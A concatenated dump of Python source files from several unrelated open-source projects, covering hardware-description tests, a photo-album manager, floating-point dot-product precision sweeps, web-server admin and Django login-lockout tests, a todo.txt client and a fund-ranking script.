Nic30/hwtLib | hwtLib/tests/synthesizer/astNodeIoReplacing_test.py | Python | mit | 2,912 | 0.008242
import unittest
from hwt.code import If, Switch
from hwt.synthesizer.rtlLevel.netlist import RtlNetlist
class AstNodeIoReplacingTC(unittest.TestCase):
def sigs_by_n(self, n):
nl = RtlNetlist()
sigs = [nl.sig(chr(ord("a") + i)) for i in range(n)]
for s in sigs:
s.hidden = False
return nl, sigs
def test_If_simple_replace_input(self):
        _, (a, b, c) = self.sigs_by_n(3)
stm = \
If(a,
b(1)
).Else(
b(0)
)
stm._replace_input(a, c)
stm_ref = If(c,
b(1)
).Else(
b(0)
)
        self.assertTrue(stm.isSame(stm_ref), [stm, stm_ref])
self.assertEqual(a.endpoints, [])
self.assertEqual(c.endpoints, [stm, stm_ref])
def test_If_elif_replace_input(self):
_, (a, b, c, d) = self.sigs_by_n(4)
stm = \
If(a,
b(1)
).Elif(c & a,
b(0)
).Else(
c(0)
)
stm._replace_input(a, d)
stm_ref = If(d,
b(1)
).Elif(c & d,
b(0)
).Else(
c(0)
)
self.assertTrue(stm.isSame(stm_ref), [stm, stm_ref])
self.assertEqual(a.endpoints, [a._isOn().singleDriver()])
self.assertEqual(c.endpoints, [(c & a).singleDriver(),
(c & d).singleDriver()])
def test_If_nested(self):
_, (a, b, c) = self.sigs_by_n(3)
stm = \
If(a,
If(c,
b(c & a)
).Else(
b(c | a)
)
).Else(
b(0)
)
stm._replace_input(a, c)
stm_ref = \
If(c,
If(c,
b(c)
).Else(
b(c)
)
).Else(
b(0)
)
self.assertTrue(stm.isSame(stm_ref), [stm, stm_ref])
self.assertNotIn(stm, a.endpoints)
self.assertIn(stm, c.endpoints)
def test_Switch_simple(self):
_, (a, b, c) = self.sigs_by_n(3)
stm = \
Switch(a)\
.Case(0,
b(1)
).Default(
b(0)
)
stm._replace_input(a, c)
stm_ref = \
Switch(c)\
.Case(0,
b(1)
).Default(
b(0)
)
self.assertTrue(stm.isSame(stm_ref), [stm, stm_ref])
self.assertNotIn(stm, a.endpoints)
self.assertIn(stm, c.endpoints)
if __name__ == '__main__':
import sys
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(AstNodeIoReplacingTC))
# suite.addTest(AstNodeIoReplacingTC("test_If_elif_replace_input"))
runner = unittest.TextTestRunner(verbosity=3)
sys.exit(not runner.run(suite).wasSuccessful())
severus21/LiPyc | src/Album.py | Python | apache-2.0 | 4,909 | 0.020371
from PIL import Image
import os.path,os
#import pickle
#import sqlite3
import hashlib
import time
import random
import logging
import copy
import threading
import itertools
from math import ceil
from enum import Enum
from copy import deepcopy
import itertools
from lipyc.utility import recursion_protect
from lipyc.Version import Versionned
from lipyc.config import *
from lipyc.utility import check_ext, make_thumbnail
from tkinter import messagebox
class Album(Versionned): #subalbums not fully implemented
def __init__(self, id, scheduler, name=None, datetime=None):
super().__init__()
self.scheduler = scheduler
self.id = id
self.name = name
        self.datetime = datetime if datetime else time.mktime(time.gmtime())
self.subalbums = set()
self.thumbnail = None
self.files = set() #order by id
self.inner_keys = [] #use for inner albums
def __deepcopy__(self, memo):
        new = Album(self.id, self.scheduler, self.name, self.datetime)
new.subalbums = deepcopy(self.subalbums)
new.thumbnail = deepcopy(self.thumbnail)
new.files = deepcopy(self.files)
new.inner_keys = deepcopy(self.inner_keys)
return new
#for copy_to,add_to,move_to
def clone(self, new_id):
alb = self.__deepcopy__(None)
alb.inner_keys.clear()
alb.id = new_id
return alb
def pseudo_clone(self):
new = Album(self.id, self.scheduler, self.name, self.datetime)
if self.thumbnail:
self.scheduler.duplicate(self.thumbnail)
new.subalbums = self.subalbums
new.thumbnail = self.thumbnail
new.files = self.files
return new
def sql(self):
return (self.id, self.name, self.datetime,
'|'.join( [ str(alb.id) for alb in self.subalbums] ), self.thumbnail,
'|'.join( [ str(afile.id) for afile in self.files] ),
'|'.join(self.inner_keys) )
def rename(self, name):
self.name = name
def add_file(self, _file):
self.files.add(_file)
if self.thumbnail == None and _file.thumbnail :
self.thumbnail = self.scheduler.duplicate_file( _file.thumbnail )
def remove_file(self, _file):
self.files.discard(_file)
@recursion_protect()
def remove_all(self):
for album in list(self.subalbums):
album.remove_all()
self.subalbums.clear()
for _file in list(self.files):
self.remove_file(_file)
self.files.clear()
def add_subalbum(self, album):
self.subalbums.add( album )
def remove_subalbum(self, album):
if album in self.subalbums:
if album.thumbnail :
self.scheduler.remove_file( album.thumbnail )
self.subalbums.discard( album )
@recursion_protect()
def export_to(self, path):
location = os.path.join(path, self.name)
if not os.path.isdir(location):
os.makedirs( location )
for _file in self.files:
_file.export_to(location)
for album in self.subalbums:
album.export_to( location )
@recursion_protect()
def lock_files(self):
for _file in self.files:
_file.io_lock.acquire()
for album in self.subalbums:
album.lock_files()
def set_thumbnail(self, location):
if self.thumbnail :
self.scheduler.remove_file(self.thumbnail)
        if not isinstance(location, str) or check_ext(location, img_exts): # open file
self.thumbnail = make_thumbnail(self.scheduler, location )
else:
            self.thumbnail = self.scheduler.add_file(location_album_default) # size and md5 ought to be computed once and for all
def deep_files(self):
tmp = itertools.chain.from_iterable(map(Album.deep_files, self.subalbums))
return itertools.chain( self.files, tmp)
@recursion_protect(0)
def __len__(self): #number of file in dir and subdir
return len(self.files) + sum( [len(a) for a in self.subalbums ] )
@recursion_protect(0)
def all_albums(self):
return itertools.chain( [self], *list(map( lambda x:x.all_albums(), self.subalbums )) )
@recursion_protect(0)
def all_files(self):
return set(itertools.chain( *list(map(lambda x:x.files, self.all_albums()))))
@recursion_protect(0)
def duplicate(self):
if self.thumbnail:
self.scheduler.duplicate_file(self.thumbnail)
for f in self.files:
f.duplicate()
for alb in self.subalbums:
alb.duplicate()
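# Editor's sketch: illustrative traversal of the Album tree above (None
# stands in for the scheduler, whose API is not shown in this excerpt):
# root = Album(1, scheduler=None, name='2016')
# root.add_subalbum(Album(2, scheduler=None, name='summer'))
# len(root)               # files in root plus all subalbums
# list(root.all_albums()) # root followed by every nested subalbum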
billzorn/fpunreal | titanfp/vec_sweep.py | Python | mit | 11,896 | 0.00269
import math
import random
import operator
import traceback
from .titanic import ndarray
from .fpbench import fpcparser
from .arithmetic import mpmf, ieee754, posit, fixed, evalctx, analysis
from .arithmetic.mpmf import Interpreter
from .sweep import search
from .sweep.utils import *
dotprod_naive_template = '''(FPCore dotprod ((A n) (B m))
:pre (== n m)
{overall_prec}
(for ([i n])
([accum 0 (! {sum_prec} (+ accum
(! {mul_prec} (* (ref A i) (ref B i)))))])
(cast accum)))
'''
dotprod_fused_template = '''(FPCore dotprod ((A n) (B m))
:pre (== n m)
{overall_prec}
(for ([i n])
([accum 0 (! {sum_prec} (fma (ref A i) (ref B i) accum))])
(cast accum)))
'''
dotprod_fused_unrounded_template = '''(FPCore dotprod ((A n) (B m))
:pre (== n m)
{overall_prec}
(for ([i n])
([accum 0 (! {sum_prec} (fma (ref A i) (ref B i) accum))])
accum))
'''
binsum_template = '''(FPCore addpairs ((A n))
:pre (> n 1)
(tensor ([i (# (/ (+ n 1) 2))])
(let* ([k1 (# (* i 2))]
[k2 (# (+ k1 1))])
(if (< k2 n)
(! {sum_prec} (+ (ref A k1) (ref A k2)))
(ref A k1)))
))
(FPCore binsum ((A n))
(while (> (size B 0) 1)
([B A (addpairs B)])
(if (== (size B 0) 0) 0 (ref B 0))))
'''
nksum_template = '''(FPCore nksum ((A n))
:name "Neumaier's improved Kahan Summation algorithm"
{sum_prec}
(for* ([i n])
([elt 0 (ref A i)]
[t 0 (+ accum elt)]
[c 0 (if (>= (fabs accum) (fabs elt))
(+ c (+ (- accum t) elt))
(+ c (+ (- elt t) accum)))]
[accum 0 t])
(+ accum c)))
'''
vec_prod_template = '''(FPCore vec-prod ((A n) (B m))
:pre (== n m)
(tensor ([i n])
(! {mul_prec} (* (ref A i) (ref B i)))))
'''
dotprod_bin_template = (
binsum_template + '\n' +
vec_prod_template + '\n' +
'''(FPCore dotprod ((A n) (B m))
:pre (== n m)
(let ([result (binsum (vec-prod A B))])
(! {overall_prec} (cast result))))
''')
dotprod_neumaier_template = (
nksum_template + '\n' +
vec_prod_template + '\n' +
'''(FPCore dotprod ((A n) (B m))
:pre (== n m)
(let ([result (nksum (vec-prod A B))])
(! {overall_prec} (cast result))))
''')
def mk_dotprod(template, overall_prec, mul_prec, sum_prec):
return template.format(overall_prec=overall_prec,
mul_prec=mul_prec,
sum_prec=sum_prec)
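# Editor's sketch: filling a template by hand; the FPCore precision
# annotations chosen here (binary32/binary64) are illustrative.
def _mk_dotprod_example():
    return mk_dotprod(dotprod_naive_template,
                      ':precision binary32',  # overall (rounded) result
                      ':precision binary64',  # per-element multiplies
                      ':precision binary64')  # running sum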
def largest_representable(ctx):
if isinstance(ctx, evalctx.IEEECtx):
return mpmf.MPMF(ctx.fbound, ctx)
elif isinstance(ctx, evalctx.PositCtx):
return mpmf.MPMF(m=1, exp=ctx.emax, ctx=ctx)
else:
raise ValueError(f'unsupported type: {type(ctx)!r}')
def smallest_representable(ctx):
if isinstance(ctx, evalctx.IEEECtx):
return mpmf.MPMF(m=1, exp=ctx.n + 1, ctx=ctx)
elif isinstance(ctx, evalctx.PositCtx):
return mpmf.MPMF(m=1, exp=ctx.emin, ctx=ctx)
else:
raise ValueError(f'unsupported type: {type(ctx)!r}')
def safe_mul_ctx(ctx):
if isinstance(ctx, evalctx.IEEECtx):
safe_es = ctx.es + 2
safe_p = (ctx.p + 1) * 2
return ieee754.ieee_ctx(safe_es, safe_es + safe_p)
elif isinstance(ctx, evalctx.PositCtx):
# very conservative; not a posit ctx
log_emax = ctx.emax.bit_length()
safe_es = log_emax + 2
safe_p = (ctx.p + 1) * 2
return ieee754.ieee_ctx(safe_es, safe_es + safe_p)
else:
raise ValueError(f'unsupported type: {type(ctx)!r}')
def safe_quire_ctx(ctx, log_carries = 30):
mul_ctx = safe_mul_ctx(ctx)
largest = largest_representable(ctx)
largest_squared = largest.mul(largest, ctx=mul_ctx)
smallest = smallest_representable(ctx)
smallest_squared = smallest.mul(smallest, ctx=mul_ctx)
# check
assert largest_squared.inexact is False and smallest_squared.inexact is False
    left = largest_squared.e + 1 + log_carries
right = smallest_squared.e
quire_type = fixed.fixed_ctx(right, left - right)
# check
assert not fixed.Fixed._round_to_context(largest_squared, ctx=quire_type).isinf
assert not fixed.Fixed._round_to_context(smallest_squared, ctx=quire_type).is_zero()
return quire_type
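# Editor's sketch: sizing a quire for a 16-bit IEEE context; the (es, nbits)
# arguments follow the ieee_ctx convention used in safe_mul_ctx above.
def _quire_example():
    ctx = ieee754.ieee_ctx(5, 16)  # half-precision-like context
    # wide enough to accumulate any dot product of such values exactly
    return safe_quire_ctx(ctx)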
def round_vec(v, ctx):
return ndarray.NDArray([mpmf.MPMF(x, ctx=ctx) for x in v])
def rand_vec(n, ctx=None, signed=True):
if signed:
v = [random.random() if random.randint(0,1) else -random.random() for _ in range(n)]
else:
v = [random.random() for _ in range(n)]
if ctx is None:
return v
else:
return round_vec(v, ctx)
def setup_dotprod(template, precs):
evaltor = Interpreter()
main = load_cores(evaltor, mk_dotprod(template, *precs))
return evaltor, main
def setup_full_quire(ctx, unrounded=False):
qctx = safe_quire_ctx(ctx)
precs = (ctx.propstr(), '', qctx.propstr())
if unrounded:
template = dotprod_fused_unrounded_template
else:
template = dotprod_fused_template
return setup_dotprod(template, precs)
# sweep
# constants: base dtype
# # trials (input data...)
# variables: quire high bits
# quire lo bits
# metrics: ulps
# BAD - globals
class VecSettings(object):
def __init__(self):
self.trials = None
self.n = None
self.As = None
self.Bs = None
self.refs = None
self.template = None
self.overall_ctx = None
self.mul_ctx = None
def cfg(self, trials, n, ctx, template, signed=True):
self.trials = trials
self.n = n
self.As = [rand_vec(n, ctx=ctx, signed=signed) for _ in range(trials)]
self.Bs = [rand_vec(n, ctx=ctx, signed=signed) for _ in range(trials)]
evaltor, main = setup_full_quire(ctx)
self.refs = [evaltor.interpret(main, [a, b]) for a, b in zip(self.As, self.Bs)]
self.template = template
self.overall_ctx = ctx
self.mul_ctx = safe_mul_ctx(ctx)
print(mk_dotprod(template, self.overall_ctx.propstr(), self.mul_ctx.propstr(), safe_quire_ctx(ctx).propstr()))
global_settings = VecSettings()
def describe_stage(quire_lo, quire_hi):
overall_prec = global_settings.overall_ctx.propstr()
mul_prec = global_settings.mul_ctx.propstr()
sum_prec = fixed.fixed_ctx(-quire_lo, quire_lo + quire_hi).propstr()
precs = (overall_prec, mul_prec, sum_prec)
print(mk_dotprod(global_settings.template, *precs))
def vec_stage(quire_lo, quire_hi):
try:
overall_prec = global_settings.overall_ctx.propstr()
mul_prec = global_settings.mul_ctx.propstr()
sum_prec = fixed.fixed_ctx(-quire_lo, quire_lo + quire_hi).propstr()
precs = (overall_prec, mul_prec, sum_prec)
evaltor, main = setup_dotprod(global_settings.template, precs)
worst_ulps = 0
sum_ulps = 0
infs = 0
for a, b, ref in zip(global_settings.As, global_settings.Bs, global_settings.refs):
result = evaltor.interpret(main, [a, b])
if result.is_finite_real():
ulps = abs(linear_ulps(result, ref))
sum_ulps += ulps
if ulps > worst_ulps:
worst_ulps = ulps
else:
worst_ulps = math.inf
sum_ulps = math.inf
infs += 1
avg_ulps = sum_ulps / global_settings.trials
return quire_lo + quire_hi, infs, worst_ulps, avg_ulps
except Exception:
traceback.print_exc()
return math.inf, math.inf, math.inf, math.inf
def init_prec():
return 16
def neighbor_prec(x):
nearby = 5
for neighbor in range(x-nearby, x+nearby+1):
if 1 <= neighbor <= 4096 and neighbor != x:
yield neighbor
vec_inits = (init_prec,) * 2
vec_neighbors = (neighbor_prec,) * 2
vec_metrics = (operator.lt,) * 4
filtered_metrics = (operator.lt, None, None, operator.lt)
def run_sweep(trials, n, ctx, template, signed=True):
global_settings.cfg(trials, n, ctx, template, signed=signed)
frontier = search.sweep_random_init(vec_stage, vec_inits, vec_neighbors, vec_metrics)
filtered_frontier = search.filter_frontier(frontier, filtered_metrics)
sor
mdavid/cherokee-webserver-svnclone | admin/plugins/wildcard.py | Python | gpl-2.0 | 3,364 | 0.012485
# -*- coding: utf-8 -*-
#
# Cherokee-admin
#
# Authors:
# Alvaro Lopez Ortega <alvaro@alobbs.com>
#
# Copyright (C) 2009-2010 Alvaro Lopez Ortega
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of version 2 of the GNU General Public
# License as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
#
import CTK
URL_APPLY = '/plugin/wildcard/apply'
NOTE_WILDCARD = N_("Accepted host name. Wildcard characters (* and ?) are allowed. Eg: *example.com")
WARNING_EMPTY = N_("At least one wildcard string must be defined.")
class Content (CTK.Container):
def __init__ (self, refreshable, key, url_apply, **kwargs):
CTK.Container.__init__ (self, **kwargs)
entries = CTK.cfg.keys (key)
# Warning message
if not entries:
notice = CTK.Notice('warning')
notice += CTK.RawHTML (_(WARNING_EMPTY))
self += notice
# List
else:
table = CTK.Table()
submit = CTK.Submitter(url_apply)
submit += table
self += CTK.Indenter(submit)
table.set_header(1)
table += [CTK.RawHTML(_('Domain pattern'))]
for i in entries:
e1 = CTK.TextCfg ("%s!%s"%(key,i))
rm = None
if len(entries) >= 2:
rm = CTK.ImageStock('del')
rm.bind('click', CTK.JS.Ajax (url_apply,
data = {"%s!%s"%(key,i): ''},
complete = refreshable.JS_to_refresh()))
table += [e1, rm]
# Add New
table = CTK.PropsTable()
next = CTK.cfg.get_next_entry_prefix (key)
table.Add (_('New host name'), CTK.TextCfg(next, False, {'class':'noauto'}), _(NOTE_WILDCARD))
submit = CTK.Submitter(url_apply)
dialog = CTK.Dialog2Buttons ({'title': _('Add new entry')}, _('Add'), submit.JS_to_submit())
submit += table
submit.bind ('submit_success', refreshable.JS_to_refresh())
submit.bind ('submit_success', dialog.JS_to_close())
dialog += submit
self += dialog
add_new = CTK.Button(_('Add New'))
add_new.bind ('click', dialog.JS_to_show())
self += add_new
class Plugin_wildcard (CTK.Plugin):
def __init__ (self, key, vsrv_num):
CTK.Plugin.__init__ (self, key)
pre = '%s!domain' %(key)
url_apply = '%s/%s' %(URL_APPLY, vsrv_num)
self += CTK.RawHTML ("<h2>%s</h2>" % (_('Accepted Domains')))
# Content
refresh = CTK.Refreshable ({'id': 'plugin_wildcard'})
refresh.register (lambda: Content(refresh, pre, url_apply).Render())
self += refresh
# Validation, and Public URLs
CTK.publish ('^%s/[\d]+$'%(URL_APPLY), CTK.cfg_apply_post, method="POST")
837468220/python-for-android | python3-alpha/python3-src/Lib/test/test_bufio.py | Python | apache-2.0 | 2,654 | 0.002638
import unittest
from test import support
import io # C implementation.
import _pyio as pyio # Python implementation.
# Simple test to ensure that optimizations in the IO library deliver the
# expected results. For best testing, run this under a debug-build Python too
# (to exercise asserts in the C code).
lengths = list(range(1, 257)) + [512, 1000, 1024, 2048, 4096, 8192, 10000,
16384, 32768, 65536, 1000000]
class BufferSizeTest(unittest.TestCase):
def try_one(self, s):
# Write s + "\n" + s to file, then open it and ensure that successive
# .readline()s deliver what we wrote.
# Ensure we can open TESTFN for writing.
support.unlink(support.TESTFN)
# Since C doesn't guarantee we can write/read arbitrary bytes in text
# files, use binary mode.
f = self.open(support.TESTFN, "wb")
try:
# write once with \n and once without
f.write(s)
f.write(b"\n")
f.write(s)
f.close()
f = open(support.TESTFN, "rb")
line = f.readline()
self.assertEqual(line, s + b"\n")
line = f.readline()
self.assertEqual(line, s)
line = f.readline()
self.assertTrue(not line) # Must be at EOF
f.close()
finally:
support.unlink(support.TESTFN)
def drive_one(self, pattern):
for length in lengths:
# Repeat string 'pattern' as often as needed to reach total length
# 'length'. Then call try_one with that string, a string one larger
# than that, and a string one smaller than that. Try this with all
# small sizes and various powers of 2, so we exercise all likely
# stdio buffer sizes, and "off by one" errors on both sides.
q, r = divmod(length, len(pattern))
teststring = pattern * q + pattern[:r]
self.assertEqual(len(teststring), length)
self.try_one(teststring)
self.try_one(teststring + b"x")
self.try_one(teststring[:-1])
def test_primepat(self):
        # A pattern with prime length, to avoid simple relationships with
# stdio buffer sizes.
self.drive_one(b"1234567890\00\01\02\03\04\05\06")
def test_nullpat(self):
self.drive_one(bytes(1000))
class CBufferSizeTest(BufferSizeTest):
open = io.open
class PyBufferSizeTest(BufferSizeTest):
open = staticmethod(pyio.open)
def test_main():
support.run_unittest(CBufferSizeTest, PyBufferSizeTest)
if __name__ == "__main__":
test_main()
bram85/topydo | topydo/lib/Todo.py | Python | gpl-3.0 | 3,165 | 0
# Topydo - A todo.txt client written in Python.
# Copyright (C) 2014 - 2015 Bram Schoenmakers <bram@topydo.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
This module provides the Todo class.
"""
from datetime import date
from topydo.lib.Config import config
from topydo.lib.TodoBase import TodoBase
from topydo.lib.Utils import date_string_to_date
class Todo(TodoBase):
"""
This class adds common functionality with respect to dates to the Todo
base class, mainly by interpreting the start and due dates of task.
"""
def __init__(self, p_str):
TodoBase.__init__(self, p_str)
self.attributes = {}
def get_date(self, p_tag):
""" Given a date tag, return a date object. """
string = self.tag_value(p_tag)
result = None
try:
result = date_string_to_date(string) if string else None
except ValueError:
pass
return result
def start_date(self):
""" Returns a date object of the todo's start date. """
return self.get_date(config().tag_start())
def due_date(self):
""" Returns a date object of the todo's due date. """
return self.get_date(config().tag_due())
def is_active(self):
"""
Returns True when the start date is today or in the past and the
task has not yet been completed.
"""
start = self.start_date()
return not self.is_completed() and (not start or start <= date.today())
def is_overdue(self):
"""
Returns True when the due date is in the past and the task has not
yet been completed.
"""
return not self.is_completed() and self.days_till_due() < 0
def days_till_due(self):
"""
Returns the number of days till the due date. Returns a negative number
of days when the due date is in the past.
Returns 0 when the task has no due date.
"""
due = self.due_date()
if due:
diff = due - date.today()
return diff.days
return 0
def length(self):
"""
Returns the length (in days) of the task, by considering the start date
and the due date. When there is no start date, its creation date is
used. Returns 0 when one of these dates is missing.
"""
start = self.start_date() or self.creation_date()
due = self.due_date()
if start and due and start < due:
diff = due - start
return diff.days
else:
return 0
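# Editor's sketch: illustrative behaviour, assuming the default todo.txt
# tags ('t:' for start, 'due:' for due) in the topydo configuration:
# todo = Todo('2015-01-01 Water plants t:2015-01-02 due:2015-01-05')
# todo.length()         -> 3 (days between start and due)
# todo.days_till_due()  -> negative once 2015-01-05 has passed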
gpanda/abrisk | fundlist.py | Python | gpl-2.0 | 8,887 | 0.000788
#!/usr/bin/env python
# -*- coding: utf8 -*-
from __future__ import print_function
__author__ = 'gpanda'
"""References:
[1] easy thread-safe queque, http://pymotw.com/2/Queue/
"""
import argparse
import collections
import fileinput
import os
import pprint
import logging  # needed for LOG.setLevel(logging.DEBUG) below
import re
import string
import sys
import threading
import time
import Queue
from libs import driver
from libs.common import LOG, is_sec_id, AbriskError
config = {}
class Fund(object):
"""Fund data structure
pbr = price / book value (nav), an important index to sort funds
"""
def __init__(self, secId, name=None, time=None, price=float(0),
volume=float(0), nav=float(1)):
"""Initialize Fund object
:param secId: security id
:param name: name
:param time: data timestamp
:param price: security price
:param volume: exchange volume (unit: 0.1 billion)
:param nav: security (fund) net asset value or book value
"""
self.secId = secId
self.name = name
self.time = time
self.price = price
self.volume = volume
self.nav = nav
self.pbr = self.price / self.nav
def __cmp__(self, other):
return cmp(self.pbr, other.pbr)
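# Editor's sketch: Fund objects sort by price/NAV ratio (pbr); the ids and
# prices below are made up. Under Python 2, __cmp__ makes `<` work directly.
def _fund_example():
    a = Fund('150019', name='a', price=0.95, nav=1.00)
    b = Fund('150020', name='b', price=1.10, nav=1.00)
    return a < b  # True: a trades at a discount (pbr 0.95 < 1.10)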
def _initialize_input_parser():
parser = argparse.ArgumentParser(
description="Show me interesting funds."
)
parser.add_argument(
'--fin',
default="default.0",
nargs="*",
metavar="FILE",
help="Security list input file."
)
parser.add_argument(
'--workers',
default=5,
nargs="?",
metavar="COUNT",
help="Working thread count."
)
parser.add_argument(
'--head', '-H',
default=0,
nargs="?",
metavar="COUNT",
help="How many items in the top rank to show."
)
parser.add_argument(
'--tail', '-T',
default=0,
nargs="?",
metavar="COUNT",
help="How many items in the bottom rank to show."
)
parser.add_argument(
'--funds', '-f',
nargs="*",
metavar="FUND INDEX",
help="One or more specified funds."
)
parser.add_argument(
'-v', '--verbose',
action="store_true",
help="Show debug messages."
)
return parser
def _parse_input_0(opts):
global config
global LOG
# retrieve fund list files
files = opts['fin']
if not isinstance(files, list):
files = [files]
config['fin'] = files
workers = int(opts['workers'])
if workers > 0:
config['workers'] = workers
head = int(opts['head'])
if head > 0:
config['head'] = head
tail = int(opts['tail'])
if tail > 0:
config['tail'] = tail
funds = opts['funds']
if not isinstance(funds, list):
funds = [funds]
config['funds'] = funds
if opts['verbose']:
config['debug'] = True
LOG.setLevel(logging.DEBUG)
return config
def _parse_input_1(cfg):
"""
TODO: comments
"""
# pprint.pprint(config)
fund_pool = collections.OrderedDict()
files = cfg['fin']
for yaf in files:
if os.path.exists(yaf):
filename = os.path.basename(yaf)
# print("{filename}".format(filename=filename))
fund_pool[filename] = collections.OrderedDict()
for line in fileinput.input(yaf):
if line.startswith("#"):
continue
fields = line.split(',')
sid = string.strip(fields[0])
if is_sec_id(sid):
                    fund_pool[filename][sid] = fields[1:]  # list.extend returns None, so store the slice directly
funds = config['funds']
if funds[0]:
category = 'Quick_show'
fund_pool[category] = collections.OrderedDict()
for fund in funds:
if is_sec_id(fund):
fund_pool[category][fund] = []
return fund_pool
def work_flow(input_queues, output_queues, error_queues):
"""
TODO: comments
"""
local = threading.local()
local.thread_name = threading.current_thread().getName()
LOG.debug("*** Enters work_flow() >>>")
# print("*** Thread-{0}:{1} *** Enters work_flow >>>"
# .format(local.thread_name, time.time()))
def retrieve_data(sid):
"""
TODO: comments
"""
LOG.debug("Retrieving data for %s", sid)
# print("Thread-{0}: Retrieving data for {1}"
# .format(local.thread_name, sid))
fund_raw_data = driver.getpbr(sid)
if not fund_raw_data:
return None
fund = Fund(sid,
name=fund_raw_data[2],
time=fund_raw_data[0],
price=fund_raw_data[4],
volume=fund_raw_data[5],
nav=fund_raw_data[3],
)
# driver.show(fund_raw_data)
return fund
for c, iq in input_queues.items():
sid=None
try:
LOG.debug("Switching to category %s", c)
# print("Thread-{0}: Switching to category {1}"
# .format(local.thread_name, c))
while not iq.empty():
sid = iq.get(False)
fund = retrieve_data(sid)
if fund:
output_queues[c].put(fund)
LOG.debug("Leaving category %s", c)
# print("Thread-{0}: Leaving category {1}"
# .format(local.thread_name, c))
except Queue.Empty as e:
LOG.info("Unexpected Queue.Empty Exception occurs, %s", e)
except Exception as e:
ename = "T:[" + local.thread_name + "]C:[" + c + "]S:[" + sid + "]"
error_queues[c].put(AbriskError(ename, e))
LOG.debug("*** Exits from work_flow() <<<")
# print("*** Thread-{0} *** Exits from work_flow <<<"
# .format(local.thread_name))
def sync(fund_pool):
"""Central controller of fund data synchronization.
** Preparing working queue (FIFO) and workers for funds of interest.
** Preparing data queue (Heap) for storing and sorting collected data.
** Retrieving fund data, refining and sorting them.
"""
input_queues = {}
output_queues = {}
error_queues = {}
for category, pool in fund_pool.items():
input_queues[category] = Queue.Queue(len(pool))
for sid in sorted(pool.keys()):
input_queues[category].put(sid)
output_queues[category] = Queue.PriorityQueue(len(pool))
error_queues[category] = Queue.Queue(len(pool))
workers = {}
worker_number = config['workers']
for i in range(worker_number):
workers[i] = threading.Thread(
target=work_flow,
name=str(i),
args=[input_queues, output_queues, error_queues],
)
workers[i].start()
for worker in workers.values():
worker.join()
rc = 0
for c, eq in error_queues.items():
if not eq.empty():
rc = 1
break
if rc == 0:
LOG.debug("All jobs have been done without errors.")
else:
LOG.debug("All jobs have been done, but there are errors.")
return output_queues, error_queues, rc
def report_fund_list(out_put_queues):
for category, priority_queue in out_put_queues.items():
LOG.debug("Category-%s", category)
# print("Category-{0}".format(category))
driver.setup_output(0, LOG)
driver.print_header()
while not priority_queue.empty():
fund = priority_queue.get()
driver.print_row((fund.time, fund.secId, fund.name,
fund.nav, fund.price, fund.volume,
fund.pbr))
def show_fund_pool(fund_pool):
for category, pool in fund_pool.items():
LOG.debug("Category %s", category)
# print("Category {category}".format(category=category))
for sid, extras in pool.items():
LOG.debug("%s, %s", sid, extras)
# print("{0}, {1}".format(sid, extras))
def main():
"""
TODO: no comments
"""
    parser = _initialize_input_parser()
dreibh/planetlab-lxc-plcapi | PLC/NetworkTypes.py | Python | bsd-3-clause | 1,417 | 0.008469
#
# Functions for interacting with the network_types table in the database
#
# Mark Huang <mlhuang@cs.princeton.edu>
# Copyright (C) 2006 The Trustees of Princeton University
#
from PLC.Faults import *
from PLC.Parameter import Parameter
from PLC.Table import Row, Table
class NetworkType(Row):
"""
Representation of a row in the network_types table. To use,
instantiate with a dict of values.
"""
    table_name = 'network_types'
primary_key = 'type'
join_tables = ['interfaces']
fields = {
'type': Parameter(str, "Network type", max = 20),
}
def validate_type(self, name):
        # Make sure name is not blank
if not len(name):
raise PLCInvalidArgument("Network type must be specified")
        # Make sure network type does not already exist
conflicts = NetworkTypes(self.api, [name])
if conflicts:
raise PLCInvalidArgument("Network type name already in use")
return name
class NetworkTypes(Table):
"""
Representation of the network_types table in the database.
"""
def __init__(self, api, types = None):
Table.__init__(self, api, NetworkType)
sql = "SELECT %s FROM network_types" % \
", ".join(NetworkType.fields)
if types:
sql += " WHERE type IN (%s)" % ", ".join( [ api.db.quote (t) for t in types ] )
self.selectall(sql)
hipnusleo/laserjet | resource/pypi/cffi-1.9.1/demo/readdir_setup.py | Python | apache-2.0 | 260 | 0
from setuptools import setup
setup(
name="example",
version="0.1",
py_modules=["readdir"],
setup_requires=["cffi>=1.0.dev0"],
cffi_modules=["readdir_build.py:ffi"],
install_requires=["cffi>=1.0.dev0"],
zip_safe=False,
)
jazzband/django-axes | tests/test_attempts.py | Python | mit | 5,846 | 0
from unittest.mock import patch
from django.http import HttpRequest
from django.test import override_settings
from django.utils.timezone import now
from axes.attempts import get_cool_off_threshold
from axes.models import AccessAttempt
from axes.utils import reset, reset_request
from tests.base import AxesTestCase
class GetCoolOffThresholdTestCase(AxesTestCase):
@override_settings(AXES_COOLOFF_TIME=42)
def test_get_cool_off_threshold(self):
timestamp = now()
with patch("axes.
|
attempts.now", return_value=timestamp):
attempt_time = timestamp
threshold_now = get_cool_off_threshold(attempt_time)
attempt_time = None
threshold_none = get_cool_off_threshold(attempt_time)
self.assertEqual(threshold_now, threshold_none)
@override_settings(AXES_COOLOFF_TIME=None)
def test_get_cool_off_threshold_error(self):
        with self.assertRaises(TypeError):
get_cool_off_threshold()
class ResetTestCase(AxesTestCase):
def test_reset(self):
self.create_attempt()
reset()
self.assertFalse(AccessAttempt.objects.count())
def test_reset_ip(self):
self.create_attempt(ip_address=self.ip_address)
reset(ip=self.ip_address)
self.assertFalse(AccessAttempt.objects.count())
def test_reset_username(self):
self.create_attempt(username=self.username)
reset(username=self.username)
self.assertFalse(AccessAttempt.objects.count())
class ResetResponseTestCase(AxesTestCase):
USERNAME_1 = "foo_username"
USERNAME_2 = "bar_username"
IP_1 = "127.1.0.1"
